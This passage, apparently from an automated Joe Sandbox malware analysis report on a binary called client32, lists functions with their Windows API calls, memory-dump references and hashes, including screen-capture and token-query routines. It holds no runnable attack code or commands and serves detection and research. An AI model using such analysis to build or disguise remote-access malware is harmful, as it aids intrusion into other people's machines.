                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                • String ID:
                                                                                • API String ID: 2800547568-0
                                                                                • Opcode ID: 271288d31555c81154ec7293090fb485e1e9931888df87aecff959c56407cd41
                                                                                • Instruction ID: afac539be2367be23e5fb54bb350a7e23aa7a519b2fcc5708fa11322496ce6e3
                                                                                • Opcode Fuzzy Hash: 271288d31555c81154ec7293090fb485e1e9931888df87aecff959c56407cd41
                                                                                • Instruction Fuzzy Hash: B4F0F0358017138AD7109B78CC0078EFBE96F0133CF1182088434AA6D4CBFA6521DB46
                                                                                Function 1117602D Relevance: 3.0, APIs: 2, Instructions: 18COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __lock.LIBCMT ref: 11176045
                                                                                  • Part of subcall function 1117459F: __mtinitlocknum.LIBCMT ref: 111745B5
                                                                                  • Part of subcall function 1117459F: __amsg_exit.LIBCMT ref: 111745C1
                                                                                  • Part of subcall function 1117459F: EnterCriticalSection.KERNEL32(?,?,?,1116C592,0000000D), ref: 111745C9
                                                                                • __tzset_nolock.LIBCMT ref: 11176056
                                                                                  • Part of subcall function 1117594C: __lock.LIBCMT ref: 1117596E
                                                                                  • Part of subcall function 1117594C: ____lc_codepage_func.LIBCMT ref: 111759B5
                                                                                  • Part of subcall function 1117594C: __getenv_helper_nolock.LIBCMT ref: 111759D7
                                                                                  • Part of subcall function 1117594C: _free.LIBCMT ref: 11175A0E
                                                                                  • Part of subcall function 1117594C: _strlen.LIBCMT ref: 11175A15
                                                                                  • Part of subcall function 1117594C: __malloc_crt.LIBCMT ref: 11175A1C
                                                                                  • Part of subcall function 1117594C: _strlen.LIBCMT ref: 11175A32
                                                                                  • Part of subcall function 1117594C: _strcpy_s.LIBCMT ref: 11175A40
                                                                                  • Part of subcall function 1117594C: __invoke_watson.LIBCMT ref: 11175A55
                                                                                  • Part of subcall function 1117594C: _free.LIBCMT ref: 11175A64
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: __lock_free_strlen$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__invoke_watson__malloc_crt__mtinitlocknum__tzset_nolock_strcpy_s
                                                                                • String ID:
                                                                                • API String ID: 1828324828-0
                                                                                • Opcode ID: e9fe97314170dd3ace1c63e43c84978c6283960cf81703fd067dc8cc761c8193
                                                                                • Instruction ID: d808ca63efd1e9ffab5fb640758e365785c4d1c524b5d003c7d68937386cb31b
                                                                                • Opcode Fuzzy Hash: e9fe97314170dd3ace1c63e43c84978c6283960cf81703fd067dc8cc761c8193
                                                                                • Instruction Fuzzy Hash: 7AE05B7E8877B3DAE7139FB4469060CF670AB05B3EF6011E5D060556C4CF701555C792
                                                                                Function 11145A70 Relevance: 2.6, APIs: 2, Instructions: 58sleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 11145990: ExpandEnvironmentStringsA.KERNEL32(000000FF,?,00000104,000000FF), ref: 111459B7
                                                                                  • Part of subcall function 11164EAD: __fsopen.LIBCMT ref: 11164EBA
                                                                                • GetLastError.KERNEL32(?,00000000,000000FF,?), ref: 11145AA5
                                                                                • Sleep.KERNEL32(000000C8,?,?,?,?,?,?,00000000,000000FF,?), ref: 11145AB5
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: EnvironmentErrorExpandLastSleepStrings__fsopen
                                                                                • String ID:
                                                                                • API String ID: 3768737497-0
                                                                                • Opcode ID: a3a7e4752acc607997ac4dc0a72fcac428bfa81aec4d9fb6ca4c049ea981d30d
                                                                                • Instruction ID: 034c310a398a014eacf4d95463f41bd89d414178975837bd0fbb5aed6b89dd46
                                                                                • Opcode Fuzzy Hash: a3a7e4752acc607997ac4dc0a72fcac428bfa81aec4d9fb6ca4c049ea981d30d
                                                                                • Instruction Fuzzy Hash: E8110476940319ABEB119F90CDC4A6FF3B8EF85A29F300165EC0097A00D775AD51C7A2
                                                                                Function 11010AE0 Relevance: 1.7, APIs: 1, Instructions: 151COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 11010B94
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LockitLockit::_std::_
                                                                                • String ID:
                                                                                • API String ID: 3382485803-0
                                                                                • Opcode ID: 900fd30ae7a6edcb6a0dfa434b7c013aaa35b72064ad6defd4f97f4d13ad8da4
                                                                                • Instruction ID: 6fbf298b81733ad5c02794b6394837a2ddc0a350229d48e3ddb53e27456ddbdc
                                                                                • Opcode Fuzzy Hash: 900fd30ae7a6edcb6a0dfa434b7c013aaa35b72064ad6defd4f97f4d13ad8da4
                                                                                • Instruction Fuzzy Hash: F1516B74A00649DFDB04CF98C980AADFBF5BF89318F248298D5469B385C776E942CB90
                                                                                Function 11143BD0 Relevance: 1.6, APIs: 1, Instructions: 70registryCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1111025B,76968400,?,?,11145D2F,00000000,CSDVersion,00000000,00000000,?), ref: 11143BF0
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: QueryValue
                                                                                • String ID:
                                                                                • API String ID: 3660427363-0
                                                                                • Opcode ID: 91328a05fa49adc7f96a877065892eb549607f162fa4bf6631575699f60be126
                                                                                • Instruction ID: ee220ac459adc96ef86e18eb3808082b68f6554a37139a9005b103db31ef1b78
                                                                                • Opcode Fuzzy Hash: 91328a05fa49adc7f96a877065892eb549607f162fa4bf6631575699f60be126
                                                                                • Instruction Fuzzy Hash: 2611B97171C2795FEB15CE46D690AAEFB6AEBC5F14F30816BE51947D00C332A482C754
                                                                                Function 110FB470 Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000048,?,?), ref: 110FB49D
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InformationToken
                                                                                • String ID:
                                                                                • API String ID: 4114910276-0
                                                                                • Opcode ID: 2187bc4dd0207f2c4cff668421eac79af3382fb4f4e0b6f0c948954ee106bd6b
                                                                                • Instruction ID: 0dd0dc8a76de1486b7c0157bd4876b78410922a839ecfb631160e4ccf4e8658d
                                                                                • Opcode Fuzzy Hash: 2187bc4dd0207f2c4cff668421eac79af3382fb4f4e0b6f0c948954ee106bd6b
                                                                                • Instruction Fuzzy Hash: E1118671A0055D9BDB11CFA8DD51BEEB3E8DB48309F0041D9E9499B340EA70AE488B90
                                                                                Function 11170FC4 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RtlAllocateHeap.NTDLL(00000008,1103179F,00000000,?,1116AC94,?,1103179F,00000000,00000000,00000000,?,1116C627,00000001,00000214,?,1111023E), ref: 11171007
                                                                                  • Part of subcall function 1116A1AF: __getptd_noexit.LIBCMT ref: 1116A1AF
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateHeap__getptd_noexit
                                                                                • String ID:
                                                                                • API String ID: 328603210-0
                                                                                • Opcode ID: 5134503a2c8da02e36f93c83ba404df5dd22f98f66039dab1883123dd78627a5
                                                                                • Instruction ID: 2763c535338e1a2717ceb9c309c83b7f036f5409daf397f77e32ba57fb3352a5
                                                                                • Opcode Fuzzy Hash: 5134503a2c8da02e36f93c83ba404df5dd22f98f66039dab1883123dd78627a5
                                                                                • Instruction Fuzzy Hash: B301D4353423A79BFB1A8E35CDA4B5BB79ABF827A4F01462DE815CB280D774D800C780
                                                                                Function 111681A3 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: __waccess_s
                                                                                • String ID:
                                                                                • API String ID: 4272103461-0
                                                                                • Opcode ID: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
                                                                                • Instruction ID: ab19ac5a5597399f8d1ca71f455f516602a279338b20f7293c175e29f7786032
                                                                                • Opcode Fuzzy Hash: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
                                                                                • Instruction Fuzzy Hash: 00C09BB705410D7F5F155DE5EC00C557F5DD6806747149115FD1C89490DD73E961D540
                                                                                Function 11164EAD Relevance: 1.5, APIs: 1, Instructions: 10COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: __fsopen
                                                                                • String ID:
                                                                                • API String ID: 3646066109-0
                                                                                • Opcode ID: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                                                                • Instruction ID: eecee5f277637f0c818c851ebfea4a610619873cfad902e7c0818376e8e04ccc
                                                                                • Opcode Fuzzy Hash: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                                                                • Instruction Fuzzy Hash: 0CC09B7644010C77CF111946DC01E4D7F1E97D0664F444010FB1C19560A573E971D585

                                                                                Non-executed Functions

                                                                                Function 110077A0 Relevance: 86.3, APIs: 35, Strings: 14, Instructions: 548windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 11088BE0: IsWindow.USER32(111314CC), ref: 11088BFC
                                                                                  • Part of subcall function 11088BE0: IsWindow.USER32(?), ref: 11088C16
                                                                                • LoadCursorA.USER32(00000000,00007F02), ref: 110077EA
                                                                                • SetCursor.USER32(00000000), ref: 110077F1
                                                                                • GetDC.USER32(?), ref: 1100781D
                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 1100782A
                                                                                • CreateCompatibleBitmap.GDI32(?,?,?), ref: 11007934
                                                                                • SelectObject.GDI32(?,00000000), ref: 11007942
                                                                                • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 11007956
                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 11007963
                                                                                • CreateCompatibleBitmap.GDI32(?,?,?), ref: 11007975
                                                                                • SelectClipRgn.GDI32(?,00000000), ref: 110079A1
                                                                                  • Part of subcall function 110022D0: DeleteObject.GDI32(?), ref: 110022E1
                                                                                  • Part of subcall function 110022D0: CreatePen.GDI32(?,?,?), ref: 11002308
                                                                                  • Part of subcall function 11005B70: CreateSolidBrush.GDI32(?), ref: 11005B97
                                                                                • BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 110079CB
                                                                                • SelectClipRgn.GDI32(?,00000000), ref: 110079E0
                                                                                • DeleteObject.GDI32(00000000), ref: 110079ED
                                                                                • DeleteDC.GDI32(?), ref: 110079FA
                                                                                • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 11007A17
                                                                                • ReleaseDC.USER32(?,?), ref: 11007A46
                                                                                • CreatePen.GDI32(00000002,00000001,00000000), ref: 11007A51
                                                                                • CreateSolidBrush.GDI32(?), ref: 11007B42
                                                                                • GetSysColor.USER32(00000004), ref: 11007B50
                                                                                • LoadBitmapA.USER32(00000000,00002EEF), ref: 11007B67
                                                                                  • Part of subcall function 11142F40: GetObjectA.GDI32(11003D76,00000018,?), ref: 11142F53
                                                                                  • Part of subcall function 11142F40: CreateCompatibleDC.GDI32(00000000), ref: 11142F61
                                                                                  • Part of subcall function 11142F40: CreateCompatibleDC.GDI32(00000000), ref: 11142F66
                                                                                  • Part of subcall function 11142F40: SelectObject.GDI32(00000000,00000000), ref: 11142F7E
                                                                                  • Part of subcall function 11142F40: CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 11142F91
                                                                                  • Part of subcall function 11142F40: SelectObject.GDI32(00000000,00000000), ref: 11142F9C
                                                                                  • Part of subcall function 11142F40: SetBkColor.GDI32(00000000,?), ref: 11142FA6
                                                                                  • Part of subcall function 11142F40: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 11142FC3
                                                                                  • Part of subcall function 11142F40: SetBkColor.GDI32(00000000,00000000), ref: 11142FCC
                                                                                  • Part of subcall function 11142F40: SetTextColor.GDI32(00000000,00FFFFFF), ref: 11142FD8
                                                                                  • Part of subcall function 11142F40: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,008800C6), ref: 11142FF5
                                                                                  • Part of subcall function 11142F40: SetBkColor.GDI32(00000000,?), ref: 11143000
                                                                                  • Part of subcall function 11142F40: SetTextColor.GDI32(00000000,00000000), ref: 11143009
                                                                                  • Part of subcall function 11142F40: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00EE0086), ref: 11143026
                                                                                  • Part of subcall function 11142F40: SelectObject.GDI32(00000000,00000000), ref: 11143031
                                                                                  • Part of subcall function 11110230: _malloc.LIBCMT ref: 11110239
                                                                                  • Part of subcall function 11110230: _memset.LIBCMT ref: 11110262
                                                                                • _memset.LIBCMT ref: 11007BC7
                                                                                • _swscanf.LIBCMT ref: 11007C34
                                                                                  • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                                • CreateFontIndirectA.GDI32(?), ref: 11007C65
                                                                                • _memset.LIBCMT ref: 11007C8C
                                                                                • GetStockObject.GDI32(00000011), ref: 11007C9F
                                                                                • GetObjectA.GDI32(00000000), ref: 11007CA6
                                                                                • CreateFontIndirectA.GDI32(?), ref: 11007CB3
                                                                                • GetWindowRect.USER32(?,?), ref: 11007DF6
                                                                                • SetWindowTextA.USER32(?,00000000), ref: 11007E33
                                                                                • GetSystemMetrics.USER32(00000001), ref: 11007E53
                                                                                • GetSystemMetrics.USER32(00000000), ref: 11007E70
                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000001), ref: 11007EC0
                                                                                • SelectObject.GDI32(?,00000000), ref: 11007986
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  • Part of subcall function 11095990: GetSystemMetrics.USER32(0000004C), ref: 1109599E
                                                                                  • Part of subcall function 11095990: GetSystemMetrics.USER32(0000004D), ref: 110959A7
